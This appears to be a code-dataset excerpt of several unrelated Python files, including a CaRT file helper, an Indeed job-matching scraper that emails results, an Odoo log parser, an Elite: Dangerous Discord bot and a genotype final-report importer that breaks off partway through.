content stringlengths 5 1.05M |
|---|
import os
import tempfile
from cart import pack_stream, unpack_stream, is_cart
from assemblyline.common import identify
# noinspection PyBroadException
def decode_file(original_path, fileinfo):
extracted_path = None
hdr = {}
with open(original_path, 'rb') as original_file:
if is_cart(original_file.read(256)):
original_file.seek(0)
extracted_fd, extracted_path = tempfile.mkstemp()
extracted_file = os.fdopen(extracted_fd, 'wb')
cart_extracted = False
try:
hdr, _ = unpack_stream(original_file, extracted_file)
cart_extracted = True
except Exception:
extracted_path = None
hdr = {}
fileinfo['type'] = 'corrupted/cart'
finally:
extracted_file.close()
if cart_extracted:
fileinfo = identify.fileinfo(extracted_path)
return extracted_path, fileinfo, hdr
# noinspection PyUnusedLocal
def encode_file(input_path, name, metadata=None):
if metadata is None:
metadata = {}
_, output_path = tempfile.mkstemp()
with open(output_path, 'wb') as oh:
with open(input_path, 'rb') as ih:
data = ih.read(64)
if not is_cart(data):
ih.seek(0)
metadata.update({'name': name})
pack_stream(ih, oh, metadata)
return output_path, f"{name}.cart"
else:
return input_path, name
|
"""
Data type for 'features' that can be used in machine learning analyses as
independent or dependent variables. feature_variables contain metadata
attributes specific to the 'feature_collection' they are part of so that the
features themselves can be queried when constructing a data set to analyze from
the database.
"""
from nest_py.core.data_types.tablelike_schema import TablelikeSchema
from nest_py.core.data_types.tablelike_entry import TablelikeEntry
COLLECTION_NAME = 'feature_variables'
def generate_schema():
schema = TablelikeSchema(COLLECTION_NAME)
#the feature_collection that this variable has metadata attributes for
schema.add_foreignid_attribute('feature_collection_id')
#the name of the feature within the feature_collection. This is not
#meant to be unique (even within the collection), but uniqueness is
#probably a good idea.
schema.add_categoric_attribute('local_name')
#feature analysis can only automatically handle these types of columns
schema.add_categoric_attribute('feature_type',
valid_values=['categoric', 'numeric'])
#the run that loaded this data into the db.TODO: the variable maybe
#shouldn't be inherently tied to the run? just the realz? variable
#might be reused
schema.add_foreignid_attribute('wix_run_id')
#all feature_variables from the same feature_collection should #have
#metadata tles that share the same nested schema here. The entries will then
#all have the same keys (eg. all feature_variables that are otus will have
#entries for the otus schema here, and then those entries will be queryable
#against each other using metadata_attributes). TODO: the entries will be
#complete tles, should there be a tle type? For now we'll use the method
#TablelikeSchema.object_to_flat_jdata(tle) to create the json payload we
#store here
schema.add_json_attribute('metadata_attributes')
return schema
|
from .LHSNode import LHSNode
class DereferenceNode(LHSNode):
def __init__(self,expr):
self._expr = expr
def orig_type(self):
return self._expr.type().base_type()
def expr(self):
return self._expr
def set_expr(self,expr):
self._expr = expr
def location(self):
return self._expr.location()
def _dump(self,dumper):
if self.type != None:
dumper.print_member("type",self.type())
dumper.print_member("expr",self._expr)
def accept(self,visitor):
return visitor.visit(self) |
import imtreat
img = imtreat.imageManagerClass.openImageFunction("../images/lena.png", 1)
img = imtreat.bodyPartsDetectionClass.smileDetectionFunction(img)
imtreat.imageManagerClass.saveImageFunction("/Téléchargements/", "image_1", ".png", img)
|
import os
import smtplib
import spacy
import urllib3
from bs4 import BeautifulSoup
from dotenv import load_dotenv
from email.message import EmailMessage
from pyshorteners import Shortener
from sklearn.neighbors import NearestNeighbors
from tqdm import tqdm
# Load environment variables.
# Docker
# env_path = '/usr/src/.env'
# load_dotenv(dotenv_path=env_path, verbose=True)
# Local
load_dotenv()
PASSWORD = os.getenv('PASSWORD')
USER_NAME = os.getenv('USER_NAME')
EMAIL_ADDRESS = os.getenv('EMAIL_ADDRESS')
API_KEY = os.getenv('API_KEY')
class JobFinder(object):
"""Get Indeed.com job listings that match closest with your provided document.
Use BeautifulSoup4 to scrape Indeed.com for job listings and descriptions.
Use the Spacy NLP library to vectorize each listing and your provided document.
Then, use KNN to find listings most relevant to your provided document.
Get the results right in your email inbox!
User supplies:
- The number of indeed.com pages to search.
- The number of search results to return.
- The email address to send results to.
- The file name of your provided document.
- The city you want to work in.
- The state that city is in.
- A search term for the kind of job you're looking for (i.e. Data Scientist).
"""
def __init__(self):
self.pages = self.num_user_input('\nEnter number of pages to search:\n') # Number of indeed pages to search.
self.num_jobs = self.num_user_input('\nEnter max job listings to receive:\n') * 2 # Buffer for duplicates.
self.resume = self.load_resume()
self.email = self.user_input('\nEnter email:\n')
print('\nYou may leave any of the following prompts blank to broaden your search.')
self.city = self.user_input('\nEnter desired city:\n').strip().title()
self.state = self.user_input('\nEnter state abbreviation:\n').strip().upper()
self.terms = self.user_input('\nEnter desired job title:\n').strip().lower()
print('\nLoading NLP packages...')
self.nlp = spacy.load('en_core_web_sm')
self.nn = NearestNeighbors(n_neighbors=self.num_jobs,
algorithm='ball_tree')
self.shortener = Shortener(api_key=API_KEY)
self.jobs = []
self.base_email = EMAIL_ADDRESS
self.vectors = None
self.indeed_scraper = IndeedScraper(self.pages, self.num_jobs, self.city, self.state, self.terms)
self.descriptions = self.indeed_scraper.get_descriptions()
self.main()
def main(self) -> None:
"""Calls all methods needed to complete program."""
# print(f"\nFound {len(descriptions)} jobs.")
self.vectors = self.get_description_vectors()
self.get_best_jobs()
self.remove_duplicates()
self.email_jobs()
def load_resume(self) -> str:
"""Load resume text from disc."""
while True:
path = self.user_input('\nEnter document file name:\n')
if path[-3:] != "txt":
print(f'\n{"-" * 20}')
print('File name must end in ".txt"')
print(f'{"-" * 20}')
continue
try:
with open(path, 'r') as f:
print('\nLoading document...')
resume = f.read().strip('\n')
break
except FileNotFoundError:
print(f'\n{"-" * 20}')
print(f"Can't find {path}")
directory = os.path.curdir
files = [file for file in os.listdir(directory) if os.path.isfile(os.path.join(directory, file))]
print(f'Files I can see: \n\n{", ".join(files)}\n')
print('Did you copy your file to the Docker container?')
print('See instructions at: https://github.com/llpk79/Job-finder/packages/111889')
print(f'{"-" * 20}')
return resume
@staticmethod
def user_input(prompt: str) -> str:
"""Prompts user with <prompt> and returns string input."""
return input(prompt)
@staticmethod
def num_user_input(prompt: str) -> int:
"""Prompts user with <prompt> and returns integer input."""
while True:
try:
num = int(input(prompt))
return num
except ValueError:
print('\nPlease enter a number.\n')
continue
def get_description_vectors(self) -> list:
"""Get Spacy vectors for each long form job description."""
print('\nGetting description vectors...\n')
return [self.nlp(doc).vector for _, doc, _ in tqdm(self.descriptions)]
def get_best_jobs(self) -> None:
"""Vectorize resume and fit a nearest neighbors classifier to find desired number of jobs."""
print(f'\nFinding best {self.num_jobs // 2} job matches...\n')
self.nn.fit(self.vectors)
neighbors = list(self.nn.kneighbors([self.nlp(self.resume).vector], self.num_jobs, return_distance=False)[0])
for neighbor in neighbors:
self.jobs.append(self.descriptions[neighbor])
def remove_duplicates(self) -> None:
"""Use Spacy's similarity function to weed out duplicate job descriptions."""
final_jobs = [self.jobs[0]]
for job in tqdm(self.jobs[1:]):
doc1 = self.nlp(job[1])
# Compare the similarity of <job> to each doc in <final_jobs>.
# If <job> matches any of <final_jobs> reject <job>.
if all([doc1.similarity(self.nlp(doc[1])) < .99 for doc in final_jobs]):
final_jobs.append(job)
# Don't include more jobs than were asked for.
if len(final_jobs) == self.num_jobs // 2:
break
self.jobs = final_jobs.copy()
def email_jobs(self) -> None:
"""Send list of jobs to user."""
print('\nEmailing jobs...\n')
msg = self.build_message()
server = self.initialize_server()
self.send_and_deactivate(server, msg)
def build_message(self) -> EmailMessage:
"""Create EmailMessage instance."""
msg = EmailMessage()
msg['subject'] = 'New jobs!!'
msg['from'] = self.base_email
msg['to'] = self.email
div = '\n' + '*-' * 20 + '\n'
msg.set_content(f'{div}'.join([job[2] + '\n\n' + self.shortener.bitly.short(job[0]) + '\n\n' + job[1] + '\n\n'
for job in self.jobs])) # job == (url, description, title)
return msg
@staticmethod
def initialize_server() -> smtplib.SMTP:
"""Start a Gmail smtp server."""
server = smtplib.SMTP('smtp.gmail.com', 587)
# server.set_debuglevel(1)
server.starttls()
server.login(USER_NAME, PASSWORD)
return server
@staticmethod
def send_and_deactivate(server: smtplib.SMTP, msg: EmailMessage) -> None:
"""Send <msg> and deactivate <server>. Print confirmation message."""
server.send_message(msg)
server.quit()
print("You've got mail!!")
class IndeedScraper(object):
def __init__(self, pages: int, num_jobs: int, city: str, state: str, terms: str) -> None:
self.pages = pages
self.num_jobs = num_jobs
self.city = city
self.state = state
self.terms = terms
self.url = self.build_url()
self.http = urllib3.PoolManager()
self.descriptions = None
def build_url(self) -> str:
"""Builds search url from user input."""
url = f'http://www.indeed.com/jobs?q=' \
f"{'%20'.join(self.terms.split())}&l={'%20'.join(self.city.split())},%20{self.state}"
print(f'\nIndeed search URL: {url}')
return url
@staticmethod
def find_long_descriptions(soup) -> list:
"""Create list of urls for long form job descriptions."""
urls = []
for div in soup.find_all(name='div',
attrs={'class': 'row'}):
for a in div.find_all(name='a',
attrs={'class': 'jobtitle turnstileLink'}):
urls.append(a['href'])
return urls
def get_next_pages(self) -> list:
"""Create a list of top level pages to search."""
return [self.url] + [self.url + f'&start={x}0' for x in range(1, self.pages)]
def get_descriptions(self) -> list:
"""Create a list of tuples containing job url, job description title,
and long form job descriptions.
"""
print('\nGetting Indeed job descriptions...\n')
descriptions = []
# Get and parse each top level page.
for base_url in tqdm(self.get_next_pages()):
request = self.http.request('GET',
base_url)
base_soup = BeautifulSoup(request.data, 'html.parser')
# Follow links to each job description on the page.
for url in self.find_long_descriptions(base_soup):
the_url = "http://www.indeed.com/" + url
req = self.http.request('GET',
the_url,
headers={'User-Agent': 'opera'},
retries=urllib3.Retry(connect=500,
read=2,
redirect=50))
# Parse out title and text from each description page and put it in the descriptions list.
soup = BeautifulSoup(req.data, 'html.parser')
title = soup.find(name='h3',
attrs={'class': 'icl-u-xs-mb--xs icl-u-xs-mt--none jobsearch-JobInfoHeader-title'})
description = soup.find(name='div',
attrs={'id': 'jobDescriptionText'})
if description:
descriptions.append((the_url, description.text, title.text))
return descriptions
if __name__ == "__main__":
scraper = JobFinder()
|
#./flexflow_python $FF_HOME/bootcamp_demo/keras_cnn_cifar10.py -ll:py 1 -ll:gpu 1 -ll:fsize 2048 -ll:zsize 12192
# from keras.models import Model, Sequential
# from keras.layers import Input, Flatten, Dense, Activation, Conv2D, MaxPooling2D, Dropout
# from keras.optimizers import SGD
# from keras.datasets import cifar10
# from keras import losses
# from keras import metrics
from flexflow.keras.models import Model, Sequential
from flexflow.keras.layers import Input, Flatten, Dense, Activation, Conv2D, MaxPooling2D, Dropout
from flexflow.keras.optimizers import SGD
from flexflow.keras.datasets import cifar10
from flexflow.keras import losses
from flexflow.keras import metrics
import numpy as np
def top_level_task():
num_classes = 10
num_samples = 10000
#(x_train, y_train), (x_test, y_test) = cifar10.load_data()
(x_train, y_train), (x_test, y_test) = cifar10.load_data(num_samples)
x_train = x_train.astype('float32')
x_train /= 255
y_train = y_train.astype('int32')
print("shape: ", x_train.shape[1:])
model = Sequential()
model.add(Conv2D(filters=32, input_shape=(3,32,32), kernel_size=(3,3), strides=(1,1), padding="valid", activation="relu"))
model.add(Conv2D(filters=32, kernel_size=(3,3), strides=(1,1), padding="valid", activation="relu"))
model.add(MaxPooling2D(pool_size=(2,2), strides=(2,2), padding="valid"))
model.add(Conv2D(filters=64, kernel_size=(3,3), strides=(1,1), padding="valid", activation="relu"))
model.add(Conv2D(filters=64, kernel_size=(3,3), strides=(1,1), padding="valid"))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2,2), strides=(2,2), padding="valid"))
model.add(Flatten())
model.add(Dense(512))
model.add(Activation("relu"))
model.add(Dropout(0.5))
model.add(Dense(num_classes))
model.add(Activation("softmax"))
opt = SGD(learning_rate=0.01)
model.compile(optimizer=opt, loss='sparse_categorical_crossentropy', metrics=['accuracy', 'sparse_categorical_crossentropy'])
print(model.summary())
model.fit(x_train, y_train, batch_size=64, epochs=4)
if __name__ == "__main__":
print("Functional API, cifar10 cnn")
top_level_task() |
import re
from typing import Iterable, Iterator, MutableMapping
from urllib.parse import urlparse
# from tartley/colorama
ANSI_CSI_RE = re.compile("\001?\033\\[((?:\\d|;)*)([a-zA-Z])\002?")
ODOO_LOG_RE = re.compile(
r"^"
r"(?P<asctime>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2},\d{3}) "
r"(?P<pid>\d+) "
r"(?P<levelname>\w+) "
r"(?P<dbname>\S+) "
r"(?P<logger>\S+): "
r"(?P<message>.*)"
r"$"
)
def parse_stream(
stream: Iterable[str], include_raw: bool = False
) -> Iterator[MutableMapping[str, str]]:
"""Parse a stream of Odoo log lines and return an iterator of log records.
Log records have the following keys:
- asctime: timestamp
- pid: process or thread id
- dbname: database name
- logger: python logger name
- levelname: python logging level name
- message: the rest of the line
"""
record = None
for line in stream:
line = ANSI_CSI_RE.sub("", line)
mo = ODOO_LOG_RE.match(line)
if mo:
# we got a match, yield previous record and create a new one
if record:
yield record
record = mo.groupdict()
if include_raw:
record["raw"] = line
else:
if record:
# irregular line in the middle of the log file: assume
# it is a continuation of the current record (a typical
# example is a multi-line stack trace)
record["message"] += "\n" + line.strip()
if include_raw:
record["raw"] += line
else:
# irregular lines at the beginning, yield them independently
r = {"message": line.strip()}
if include_raw:
r["raw"] = line
yield r
if record:
yield record
ODOO_WERKZEUG_RE = re.compile(
r"^(?P<remote_addr>\S+)"
r" .+? .+? \[.*?\]"
r" \"(?P<request_method>\S+) (?P<request_uri>\S+) .*?\""
r" (?P<status>\S+) \S+"
r"( (?P<perf_info>"
r"(?P<sql_count>\d+) "
r"(?P<sql_time>\d*\.\d+) "
r"(?P<other_time>\d*\.\d+)"
r"))?"
r".*$"
)
def _convert_field(d, k, converter):
if k in d:
try:
d[k] = converter(d[k])
except Exception:
del d[k]
def enrich_werkzeug(
records: Iterable[MutableMapping[str, str]]
) -> Iterator[MutableMapping[str, str]]:
"""Enrich werkzeug (http requests) log records"""
for record in records:
if record.get("logger") == "werkzeug":
mo = ODOO_WERKZEUG_RE.match(record.get("message", ""))
if mo:
record.update(
(k, v) for k, v in mo.groupdict().items() if v is not None
)
record["request_path"] = urlparse(record["request_uri"]).path
_convert_field(record, "sql_count", int)
_convert_field(record, "sql_time", float)
_convert_field(record, "other_time", float)
if "sql_time" in record and "other_time" in record:
record["total_time"] = record["sql_time"] + record["other_time"]
yield record
def enrich(
records: Iterable[MutableMapping[str, str]]
) -> Iterator[MutableMapping[str, str]]:
return enrich_werkzeug(records)
|
import bpy
from bpy.props import *
from bpy.types import Node, NodeSocket
from arm.logicnode.arm_nodes import *
class CanvasSetRotationNode(Node, ArmLogicTreeNode):
'''Set canvas element rotation'''
bl_idname = 'LNCanvasSetRotationNode'
bl_label = 'Canvas Set Rotation'
bl_icon = 'QUESTION'
def init(self, context):
self.inputs.new('ArmNodeSocketAction', 'In')
self.inputs.new('NodeSocketString', 'Element')
self.inputs.new('NodeSocketFloat', 'Rad')
self.outputs.new('ArmNodeSocketAction', 'Out')
add_node(CanvasSetRotationNode, category='Canvas')
|
#!/usr/bin/env python
import os
import logging
import wfdb
import glob
import numpy as np
import pyedflib
import mne
from mne.io import read_raw_edf
from fourier import fourier
from config import *
mapping = {'EOG horizontal': 'eog',
'Resp oro-nasal': 'misc',
'EMG submental': 'misc',
'Temp rectal': 'misc',
'Event marker': 'misc'}
def edfplot(psg_name, ann_name):
raw_train = mne.io.read_raw_edf(psg_name)
annot_train = mne.read_annotations(ann_name)
raw_train.set_annotations(annot_train, emit_warning=False)
raw_train.set_channel_types(mapping)
# plot some data
raw_train.plot(duration=60, scalings='auto')
annotation_desc_2_event_id = {'Sleep stage W': 1,
'Sleep stage 1': 2,
'Sleep stage 2': 3,
'Sleep stage 3': 4,
'Sleep stage 4': 4,
'Sleep stage R': 5}
# keep last 30-min wake events before sleep and first 30-min wake events after
# sleep and redefine annotations on raw data
annot_train.crop(annot_train[1]['onset'] - 30 * 60,
annot_train[-2]['onset'] + 30 * 60)
raw_train.set_annotations(annot_train, emit_warning=False)
events_train, _ = mne.events_from_annotations(
raw_train, event_id=annotation_desc_2_event_id, chunk_duration=30.)
# create a new event_id that unifies stages 3 and 4
event_id = {'Sleep stage W': 1,
'Sleep stage 1': 2,
'Sleep stage 2': 3,
'Sleep stage 3/4': 4,
'Sleep stage R': 5}
# plot events
fig = mne.viz.plot_events(events_train, event_id=event_id,
sfreq=raw_train.info['sfreq'],
first_samp=events_train[0, 0])
# keep the color-code for further plotting
stage_colors = plt.rcParams['axes.prop_cycle'].by_key()['color']
def ftt(data):
### BEFORE FOURIER
plt.plot(data)
plt.title('Before Fourier Transformation')
plt.ylabel('sleep')
plt.xlabel('time')
plt.show()
### AFTER FOURIER
plt.plot(fourier(data))
plt.title('After Fourier Transformation')
plt.ylabel('sleep')
plt.xlabel('time')
plt.legend(['before', 'after'], loc='upper right')
plt.show()
def main(args = sys.argv[1:]):
if name == 'main':
main()
|
import discord
from discord.ext import commands
import random
import re
import traceback
import math
import elite
import elite_mapper
description = '''Elite:Dangerous connector bot.'''
token = ''
uid_regex = re.compile(r'<.*?(\d+)>')
bot = commands.Bot(command_prefix='!ed ', description=description)
@bot.event
async def on_ready():
print('Logged in as')
print(bot.user.name)
print(bot.user.id)
print('------')
elite.load_data()
@bot.command()
async def locate(name: str):
"""Gets the location of a commander (alt for 'location')"""
name = get_uid(name)
await bot.say(locate_handler(name))
@bot.command()
async def location(name: str):
"""Gets the location of a commander (alt for 'locate')"""
await bot.say(locate_handler(name))
def locate_handler(name: str):
cmdr = get_uid(name)
loc = elite.get_cmdr_system_name(cmdr)
cmdrName, _ = elite.get_cmdr(cmdr)
if not loc or loc == 'None':
return '{0} could not be located'.format(name)
return '{0} is at {1}'.format(cmdrName, loc)
def get_uid(name):
match = uid_regex.search(name)
if not match: return name
return match.group(1)
@bot.command(pass_context=True)
async def register(ctx, cmdrName: str, key=None):
"""Links a discord username and a CMDR (and EDSM API key)"""
user = str(ctx.message.author.id)
elite.set_cmdr(user, cmdrName, key)
msg = 'o7 Greetings CMDR {0}! I\'ve got you registered with "<@{1}>"=="{0}".'.format(cmdrName, user)
if key:
msg += ' I advise deleting your post so your API Key doesn\'t ~~get intercepted by Thargoids~~ persist in the chat logs.'
await bot.say(msg)
@bot.command()
async def poi(poiName: str, poiLocation = None):
"""Displays or creates/updates a Point of Interest"""
msg = 'Could not process command :('
if poiLocation and poiLocation != '':
if (poiLocation == 'remove' or poiLocation == 'delete'):
if (elite.remove_POI(poiName)):
msg = 'Removed Point of Interest "{0}"'.format(poiName)
else:
msg = '"{0}" is not a known point of interest'.format(poiName)
else:
poi = elite.add_POI(poiName, poiLocation)
if poi:
msg = 'Added Point of Interest "{0}" at {1} {2}'.format(poi.name, poi.system, poi.coords)
else:
msg = 'Could not find system with name "{0}"'.format(poiLocation)
else:
poi = elite.get_POI(poiName)
if poi:
msg = '{0} ({1}) is located at {2}'.format(poi.name, poi.system, poi.coords)
else:
msg = '"{0}" is not a known point of interest'.format(poiName)
await bot.say(msg)
@bot.command()
async def pois():
"""Lists all Points of Interest"""
pois = elite.get_POIs()
msg = 'Points of Interest:\n'
for _, poi in sorted(pois.items()):
msg += '{0}: {1}\n'.format(poi.name, poi.system)
await bot.say(msg)
@bot.command()
async def distance(item1: str, item2: str):
"""Gets the distance between two items (CMDR, PoI, System)"""
uid1 = get_uid(item1)
uid2 = get_uid(item2)
dist = elite.friendly_get_distance(uid1, uid2)
dist = round(dist, 2)
msg = '{0} is {1} LY from {2}'.format(item2, dist, item1)
await bot.say(msg)
@bot.command(pass_context=True)
async def info(ctx, system: str):
"""Gets detailed information on a system (alt for 'system')"""
await bot.send_typing(ctx.message.channel)
await bot.say(info_handler(system))
@bot.command(pass_context=True)
async def system(ctx, system: str):
"""Gets detailed information on a system (alt for 'info')"""
await bot.send_typing(ctx.message.channel)
await bot.say(info_handler(system))
def info_handler(system):
return elite.get_system_info_for_display(system)
@bot.command(pass_context = True)
async def radius(ctx, system: str, radius: float, minRadius = 0.0):
"""Returns systems within a radius around a system"""
await bot.send_typing(ctx.message.channel)
coords = elite.friendly_get_coords(system)
systems = elite.get_systems_in_radius(coords, radius, minRadius)
if systems:
msg = '{0} systems between {1} and {2} LY from {3}'.format(len(systems), minRadius, radius, system)
if len(systems) > 0:
msg += ':\n'
limit = 50
if len(systems) > limit:
msg += '(closest {0} shown)\n'.format(limit)
count = 0
for sys in sorted(systems, key=lambda x: x['distance']):
msg += '{0}: {1} LY\n'.format(sys['name'], sys['distance'])
count += 1
if count > limit: break
else:
msg += '\n'
else:
msg = 'No systems in range'
await bot.say(msg)
@bot.command(pass_context=True)
async def balance(ctx, name: str):
'''Gets credit balance of cmdr name'''
await bot.send_typing(ctx.message.channel)
cmdr = get_uid(name)
credits = elite.get_credits(cmdr)
msg = '{0} '.format(name)
if credits and credits['msgnum'] == 100:
msg += 'has {:,} credits.'.format(credits['credits'][0]['balance'])
else:
msg += 'could not be found'
await bot.say(msg)
@bot.command(pass_context=True)
async def ranks(ctx, name: str):
'''Gets all ranks of cmdr name'''
await bot.send_typing(ctx.message.channel)
cmdr = get_uid(name)
ranks = elite.get_ranks(cmdr)
msg = '__{0}__\n'.format(name)
if ranks and ranks['msgnum'] == 100:
msg += '{0} : {1} ({2}%)\n'.format('Combat', ranks['ranksVerbose']['Combat'], ranks['progress']['Combat'])
msg += '{0} : {1} ({2}%)\n'.format('Trade', ranks['ranksVerbose']['Trade'], ranks['progress']['Trade'])
msg += '{0} : {1} ({2}%)\n'.format('Explore', ranks['ranksVerbose']['Explore'], ranks['progress']['Explore'])
msg += '{0} : {1} ({2}%)\n'.format('CQC', ranks['ranksVerbose']['CQC'], ranks['progress']['CQC'])
msg += '{0} : {1} ({2}%)\n'.format('Federation', ranks['ranksVerbose']['Federation'], ranks['progress']['Federation'])
msg += '{0} : {1} ({2}%)\n'.format('Empire', ranks['ranksVerbose']['Empire'], ranks['progress']['Empire'])
else:
msg = 'No ranks found for "{0}"'.format(name)
await bot.say(msg)
@bot.command(pass_context=True)
async def materials(ctx, name: str):
'''Gets all materials for the cmdr'''
await bot.send_typing(ctx.message.channel)
cmdr = get_uid(name)
materials = elite.get_materials(cmdr)
msg = '_{0} materials_\n'.format(name)
if materials and materials['msgnum'] == 100:
for mats in materials['materials']:
#only include materials which the cmdr has at least 1 of
if mats['qty'] > 0:
msg += '{0} : {1}\n'.format(mats['name'], mats['qty'])
else:
msg = 'No materials found for "{0}"'.format(name)
await bot.say(msg)
@bot.command(pass_context=True)
async def cargo(ctx, name: str):
'''Gets all cargo for the cmdr'''
await bot.send_typing(ctx.message.channel)
cmdr = get_uid(name)
cargo = elite.get_cargo(cmdr)
msg = '_{0} cargo_\n'.format(name)
cargoNum = 0
if cargo and cargo['msgnum'] == 100:
for item in cargo['cargo']:
#Only include cargo which the cmdr has at least 1 of
if item['qty'] > 0:
msg += '{0} : {1}\n'.format(item['name'], item['qty'])
cargoNum += 1
else:
msg = 'No cargo found for "{0}"'.format(name)
#set cargoNum to -1 so we don't print below
cargoNum = -1
if cargoNum == 0:
msg += 'No cargo!'
await bot.say(msg)
@bot.command(pass_context=True)
async def data(ctx, name: str):
'''Gets all encoded data for the cmdr'''
await bot.send_typing(ctx.message.channel)
cmdr = get_uid(name)
encodedData = elite.get_encoded_data(cmdr)
msg = '_{0} encoded data_\n'.format(name)
if encodedData and encodedData['msgnum'] == 100:
for data in encodedData['data']:
#Only include encoded data which the cmdr has at least 1 of
if data['qty'] > 0:
msg += '{0} : {1}\n'.format(data['name'], data['qty'])
else:
msg = 'No encoded data found for "{0}"'.format(name)
await bot.say(msg)
@bot.command(pass_context=True)
async def map(ctx):
'''Returns a map of the requested items'''
await bot.type()
elite_mapper.parse_and_plot(ctx.message.content)
with open('data/fig.png', 'rb') as f:
await bot.upload(f)
@bot.command()
async def rate(name: str):
'''Gets the jump rate, average jump distance, and ly per hour for a commander'''
cmdr = get_uid(name)
try:
rate = elite.get_jump_rate(cmdr)
dist = elite.get_average_jump_distance(cmdr)
distRate = rate*dist
msg = f'{name} jumps {rate:0.2f} times per hour at an average jump distance of {dist:0.2f} ly for a rate of {distRate:0.2f} ly per hour.'
except:
msg = f'Could not determine rate information for "{name}": {traceback.format_exc().splitlines()[-1]}'
await bot.say(msg)
@bot.command()
async def target(system: str, name: str):
'''Gets the distance and estimate of jumps and time required to travel to a target system'''
cmdr = get_uid(name)
try:
_, known = elite.get_cmdr(cmdr)
if not known: return 'Command requires target system and commander name!'
rate = elite.get_jump_rate(cmdr)
avgDist = elite.get_average_jump_distance(cmdr)
dist = elite.friendly_get_distance(cmdr, system)
jumps = math.ceil(dist/avgDist)
time = jumps / rate
msg = f'"{system}" is {dist:0.2f} ly from {name}. That\'s about {jumps} jumps or {time:0.2f} hours.'
except:
msg = f'Could not process "target" command: {traceback.format_exc().splitlines()[-1]}'
await bot.say(msg)
def get_token():
with open('data/token.secret', 'r') as f:
return f.readline().strip()
bot.run(get_token())
|
def generate_test(index, labels, data):
def test(self):
for event_id in data[index]:
method = getattr(self, labels[event_id])
method()
return test
def _event_sequence_test_impl(labels, data):
def _(clazz):
for i in range(0, len(data)):
test_name = 'test_%s' % ('_'.join([labels[x] for x in data[i]]))
test = generate_test(i, labels, data)
setattr(clazz, test_name, test)
return clazz
return _
def event_sequence_test(data_source):
return _event_sequence_test_impl(data_source.getLabels(), data_source.getData())
def event_sequence_test_raw(labels, data):
return _event_sequence_test_impl(labels, data)
|
import argparse
import csv
from os.path import splitext, basename
import sys
import time
import haploqa.mongods as mds
import haploqa.sampleannoimport as sai
from pymongo.errors import DuplicateKeyError
header_tag = '[header]'
data_tag = '[data]'
tags = {header_tag, data_tag}
snp_name_col_hdr = 'SNP Name'
x_col_hdr = 'X'
y_col_hdr = 'Y'
allele1_fwd_col_hdr = 'Allele1 - Forward'
allele2_fwd_col_hdr = 'Allele2 - Forward'
def import_final_report(user_email, generate_ids, on_duplicate, final_report_file, sample_anno_dicts, platform_id, sample_tags, db):
def save_sample(samp):
if samp is not None:
try:
samp = sai.merge_dicts(samp, sample_anno_dicts[samp['sample_id']])
except KeyError:
pass
if generate_ids:
# if we're asked to generate IDs we move the sample ID into "other_ids"
samp['other_ids'] = [samp['sample_id']]
samp['sample_id'] = mds.gen_unique_id(db)
else:
samp['other_ids'] = []
mds.post_proc_sample(samp, user_email)
samp['owner'] = user_email
if on_duplicate == 'replace':
update_res = db.samples.replace_one(
{'sample_id': samp['sample_id']},
samp,
upsert=True,
)
if update_res.upserted_id is None:
print('replaced sample with canonical ID:', samp['sample_id'])
else:
try:
db.samples.insert_one(samp)
except DuplicateKeyError:
if on_duplicate == 'skip':
print('skipping insert of duplicate sample with canonical ID:', samp['sample_id'])
else:
print(
'halting import after detecting duplicate canonical ID:',
samp['sample_id'],
file=sys.stderr,
)
raise
platform_chrs, snp_count_per_chr, snp_chr_indexes = mds.within_chr_snp_indices(platform_id, db)
prev_time = time.time()
all_sample_ids = set()
# for MiniMUGA, the files I've had access to had blank values for 'Sample ID'
# although the header value is there. The 'Sample Name' values were populated
# though so swap the sample ID column header to 'Sample Name'
if platform_id == 'MiniMUGA':
sample_id_col_hdr = 'Sample Name'
else:
sample_id_col_hdr = 'Sample ID'
data_col_hdrs = {
snp_name_col_hdr, sample_id_col_hdr,
x_col_hdr, y_col_hdr,
allele1_fwd_col_hdr, allele2_fwd_col_hdr
}
with open(final_report_file, 'r') as final_report_handle:
final_report_table = csv.reader(final_report_handle, delimiter='\t')
curr_section = data_tag
data_header_indexes = None
curr_sample = None
for row_index, row in enumerate(final_report_table):
def fmt_err(msg, cause=None):
ex = Exception('Format Error in {} line {}: {}'.format(final_report_file, row_index + 1, msg))
if cause is None:
raise ex
else:
raise ex from cause
def string_val(col_name):
return row[data_header_indexes[col_name]].strip()
def float_val(col_name):
str_val = string_val(col_name)
try:
return float(str_val)
except ValueError as e:
if str_val.upper() == 'NA':
return float('nan')
else:
fmt_err('failed to convert "' + str_val + '" into a float', e)
# just ignore empty lines
if row:
if len(row) == 1 and row[0].lower() in tags:
curr_section = row[0].lower()
else:
if curr_section == header_tag:
# TODO do something with the header data
pass
elif curr_section == data_tag:
if data_header_indexes is None:
# this is the header. we'll just make note of the indices
data_header_indexes = {
col_hdr: i
for i, col_hdr in enumerate(row)
if col_hdr in data_col_hdrs
}
# confirm that all are represented
for col_hdr in data_col_hdrs:
if col_hdr not in data_header_indexes:
fmt_err('failed to find required header "{}" in data header'.format(col_hdr))
else:
snp_name = string_val(snp_name_col_hdr)
sample_id = string_val(sample_id_col_hdr)
x = float_val(x_col_hdr)
y = float_val(y_col_hdr)
allele1_fwd = string_val(allele1_fwd_col_hdr)
allele2_fwd = string_val(allele2_fwd_col_hdr)
if curr_sample is None or sample_id != curr_sample['sample_id']:
# if we've seen this ID before it means that rows are not grouped by sample ID
if sample_id in all_sample_ids:
raise Exception('Final report must be grouped by sample ID but it is not')
# we hit a new sample so at this point we commit the curr_sample to the
# DB and move on to building a new sample
all_sample_ids.add(sample_id)
save_sample(curr_sample)
curr_time = time.time()
print('took {:.1f} sec. importing sample: {}'.format(curr_time - prev_time, sample_id))
prev_time = curr_time
chr_dict = dict()
for chr in platform_chrs:
curr_snp_count = snp_count_per_chr[chr]
chr_dict[chr] = {
'xs': [float('nan')] * curr_snp_count,
'ys': [float('nan')] * curr_snp_count,
'allele1_fwds': ['-'] * curr_snp_count,
'allele2_fwds': ['-'] * curr_snp_count,
}
curr_sample = {
'sample_id': sample_id,
'platform_id': platform_id,
'chromosome_data': chr_dict,
'tags': sample_tags,
'unannotated_snps': [],
}
try:
snp_chr_index = snp_chr_indexes[snp_name]
except KeyError:
snp_chr_index = None
if snp_chr_index is not None:
snp_chr = snp_chr_index['chromosome']
snp_index = snp_chr_index['index']
curr_sample_chr = curr_sample['chromosome_data'][snp_chr]
curr_sample_chr['xs'][snp_index] = x
curr_sample_chr['ys'][snp_index] = y
